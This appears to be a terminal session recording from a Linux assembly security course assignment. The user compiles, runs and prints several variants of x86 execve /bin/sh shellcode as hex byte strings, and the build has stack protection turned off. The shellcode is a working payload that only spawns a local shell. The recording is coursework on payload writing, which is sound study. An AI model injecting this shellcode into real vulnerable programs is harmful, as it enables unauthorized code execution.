[49.684693, "o", "AE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m../../bin/compile.sh shellcode.c\u001b[K\r\n[*] Compiling shellcode\u001b[K\r\n[+] Calling gcc without stack protection\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./shellcode\u001b[K\r\nShellcode Length:  32\u001b[K\r\n$ exit\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x31\\xd2\\x29\\xc0\\xb0\\xf4\\x2c\\xe9\\xc4\\xe2\\x70\\xf2\\xc9\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  31\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x29\\xc0\\xb0\\x17\\x2c\\xc\\x31\\xc9\\x31\\xd2\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  27\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellco"]
[49.684894, "o", "de.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m../../bin/compile.sh shellcode.c\u001b[K\r\n[*] Compiling shellcode\u001b[K\r\n[+] Calling gcc without stack protection\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 1h 57m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 bash \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;208m 31% \u001b[38;5;245m| 11:03 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[32;1H\u001b[?12l\u001b[?25h"]
[49.749649, "o", "\u001b[1m\u001b[7m%\u001b(B\u001b[m                                                                                                                \u001b[32;1H \u001b[1;32r\u001b[32;1H\u001b[K\u001b[112C\n\u001b[31;1H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\r\n\u001b[37m % \u001b(B\u001b[m\u001b[K\u001b[1;33r\u001b[32;4H\u001b[?2004h"]
[49.855886, "o", "\u001b[?25l\u001b[H\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x29\\xc0\\xb0\\xe\\x2c\\x3\\x6a\\x39\\x5a\\x80\\xea\\x39\\x31\\xc9\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  31\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m../../bin/compile.sh shellcode.c\u001b[K\r\n[*]"]
[49.856166, "o", " Compiling shellcode\u001b[K\r\n[+] Calling gcc without stack protection\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./shellcode\u001b[K\r\nShellcode Length:  32\u001b[K\r\n$ exit\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x31\\xd2\\x29\\xc0\\xb0\\xf4\\x2c\\xe9\\xc4\\xe2\\x70\\xf2\\xc9\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  31\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x29\\xc0\\xb0\\x17\\x2c\\xc\\x31\\xc9\\x31\\xd2\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  27\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b("]
[49.856317, "o", "B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m../../bin/compile.sh shellcode.c\u001b[K\r\n[*] Compiling shellcode\u001b[K\r\n[+] Calling gcc without stack protection\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 1h 57m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 bash \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;208m 31% \u001b[38;5;245m| 11:03 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[32;4H\u001b[?12l\u001b[?25h"]
[49.873856, "o", "\u001b[?25l\u001b[H\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x29\\xc0\\xb0\\xe\\x2c\\x3\\x6a\\x39\\x5a\\x80\\xea\\x39\\x31\\xc9\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  31\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m../../bin/compile.sh shellcode.c\u001b[K\r\n[*]"]
[49.874146, "o", " Compiling shellcode\u001b[K\r\n[+] Calling gcc without stack protection\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./shellcode\u001b[K\r\nShellcode Length:  32\u001b[K\r\n$ exit\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x31\\xd2\\x29\\xc0\\xb0\\xf4\\x2c\\xe9\\xc4\\xe2\\x70\\xf2\\xc9\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  31\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x29\\xc0\\xb0\\x17\\x2c\\xc\\x31\\xc9\\x31\\xd2\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  27\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b("]
[49.874308, "o", "B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m../../bin/compile.sh shellcode.c\u001b[K\r\n[*] Compiling shellcode\u001b[K\r\n[+] Calling gcc without stack protection\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 1h 57m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 bash \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;208m 31% \u001b[38;5;245m| 11:03 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[32;4H\u001b[?12l\u001b[?25h"]
[49.948956, "o", "\u001b[?25l\u001b[H\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x29\\xc0\\xb0\\xe\\x2c\\x3\\x6a\\x39\\x5a\\x80\\xea\\x39\\x31\\xc9\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  31\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m../../bin/compile.sh shellcode.c\u001b[K\r\n[*]"]
[49.950134, "o", " Compiling shellcode\u001b[K\r\n[+] Calling gcc without stack protection\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./shellcode\u001b[K\r\nShellcode Length:  32\u001b[K\r\n$ exit\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x31\\xd2\\x29\\xc0\\xb0\\xf4\\x2c\\xe9\\xc4\\xe2\\x70\\xf2\\xc9\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  31\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x29\\xc0\\xb0\\x17\\x2c\\xc\\x31\\xc9\\x31\\xd2\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  27\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b("]
[49.950385, "o", "B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m../../bin/compile.sh shellcode.c\u001b[K\r\n[*] Compiling shellcode\u001b[K\r\n[+] Calling gcc without stack protection\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 1h 57m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 bash \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;208m 31% \u001b[38;5;245m| 11:03 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[32;4H\u001b[?12l\u001b[?25h"]
[50.008551, "o", "."]
[50.523398, "o", "\u001b]0;SLAE ❐ SLAE ● 1 zsh\u0007\u001b[?25l\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 1h 57m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                                  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;208m 31% \u001b[38;5;245m| 11:03 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[32;5H\u001b[?12l\u001b[?25h"]
[50.52462, "o", "\b./"]
[50.953208, "o", "s"]
[51.079844, "o", "h"]
[51.276201, "o", "ellcode"]
[51.82657, "o", "\u001b[1;32r\u001b[32;113H\n\u001b[1;33r\u001b[32;1H\u001b[?2004l"]
[51.828712, "o", "Shellcode Length:  28"]
[51.828992, "o", "\u001b[1;32r\u001b[32;113H\n\u001b[1;33r\u001b[32;1H"]
[51.829931, "o", "$ "]
[53.304657, "o", "e"]
[53.423277, "o", "x"]
[53.639478, "o", "i"]
[53.879413, "o", "t"]
[54.359737, "o", "\u001b[1;32r\u001b[32;113H\n\r\u001b[1m\u001b[7m%\u001b(B\u001b[m                                                                                                                \u001b[32;1H \u001b[1;33r\u001b[32;1H"]
[54.360457, "o", "\u001b[1;32r\u001b[32;1H\u001b[K\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b[1;33r\u001b[32;60H\u001b(B\u001b[m"]
[54.360683, "o", "\u001b[1;32r\u001b[32;113H\n\u001b[1;33r\u001b[32;1H"]
[54.360876, "o", "\u001b[37m\u001b[1m % \u001b(B\u001b[m"]
[54.361056, "o", "\u001b[K"]
[54.361399, "o", "\u001b[?2004h"]
[55.162794, "o", "\u001b[?25l\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 1h 57m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                              ⌨   ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;208m 31% \u001b[38;5;245m| 11:03 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[32;4H\u001b[?12l\u001b[?25h"]
[55.216644, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m../../bin/compile.sh shellcode.c\u001b[K\r\n[*] Compiling shellcode\u001b[K\r\n[+] Calling gcc without stack protection\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./shellcode\u001b[K\r\nShel"]
[55.216918, "o", "lcode Length:  32\u001b[K\r\n$ exit\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x31\\xd2\\x29\\xc0\\xb0\\xf4\\x2c\\xe9\\xc4\\xe2\\x70\\xf2\\xc9\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  31\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x29\\xc0\\xb0\\x17\\x2c\\xc\\x31\\xc9\\x31\\xd2\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  27\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m../../bin/compile.sh shellcode.c\u001b[K\r\n[*] Compiling shellcode\u001b[K\r\n[+] Calling gcc without stack protection\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE"]
[55.217074, "o", "/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./shellcode\u001b[K\r\nShellcode Length:  28\u001b[K\r\n$ exit\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 1h 57m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                              ⌨   ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;208m 31% \u001b[38;5;245m| 11:03 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[32;4H\u001b[?12l\u001b[?25h"]
[55.332592, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m../../bin/compile.sh shellcode.c\u001b[K\r\n[*] Compiling shellcode\u001b[K\r\n[+] Calling gcc without stack protection\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./shellcode\u001b[K\r\nShel"]
[55.332896, "o", "lcode Length:  32\u001b[K\r\n$ exit\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x31\\xd2\\x29\\xc0\\xb0\\xf4\\x2c\\xe9\\xc4\\xe2\\x70\\xf2\\xc9\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  31\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x29\\xc0\\xb0\\x17\\x2c\\xc\\x31\\xc9\\x31\\xd2\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  27\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m../../bin/compile.sh shellcode.c\u001b[K\r\n[*] Compiling shellcode\u001b[K\r\n[+] Calling gcc without stack protection\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE"]
[55.333064, "o", "/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./shellcode\u001b[K\r\nShellcode Length:  28\u001b[K\r\n$ exit\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 1h 57m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                              ⌨   ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;208m 31% \u001b[38;5;245m| 11:03 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[32;4H\u001b[?12l\u001b[?25h"]
